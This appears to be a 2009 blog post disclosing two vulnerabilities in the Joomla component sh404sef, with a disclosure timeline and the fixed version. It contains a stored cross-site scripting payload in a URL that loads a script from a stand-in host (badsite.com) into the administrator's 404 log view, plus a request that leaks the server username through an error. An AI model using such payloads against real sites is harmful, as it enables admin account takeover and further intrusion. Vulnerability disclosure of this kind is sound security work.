Monday, 08 June 2009 17:01

Not too long ago, while doing some routine pentesting of my site, I came across two vulnerabilities in the Joomla! component sh404sef.

The first exploit allowed for scripts to be run in the administrator side of the site by sending specially crafted requests to a site running sh404sef.

http://vulnerable.com/<script src=http://badsite.com/evil.js></script>

Once this is done, any administrator that visits the URL Manager and looks at the 404 Errors will end up executing this script with rights equal to the admin. I leave it as an exercise to the reader to figure out the next step.

The second vulnerability I found is pretty simple, and is only useful for reducing the amount of effort needed for further penetration. By visiting the url:

http://vulnerable.com/index.php?option=com_sh404sef

... an attacker is presented with an interesting error:

Fatal error: Class 'sef_sh404sef' not found in /home/****/public_html/administrator/components/com_sh404sef/sh404sef.class.php(3203) : eval()'d code on line 1 

This gives an attacker the real user name of the user on the host, most useful for attempts at gaining FTP or SFTP access.

These vulnerabilities are fixed as of version 1.0.20 Beta Build 237

Timeline

  • Vulnerabilities Discovered: 17 May 2009
  • Vendor Notified: 20 May 2009
  • Vendor Response: 30 May 2009
  • Update Available: 8 Jun 2009
  • Disclosure: 8 Jun 2009
Last Updated on Thursday, 30 September 2010 17:41
 

Add your comment

Your name:
Comment:
  The word for verification. Lowercase letters only with no spaces.
Word verification:

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions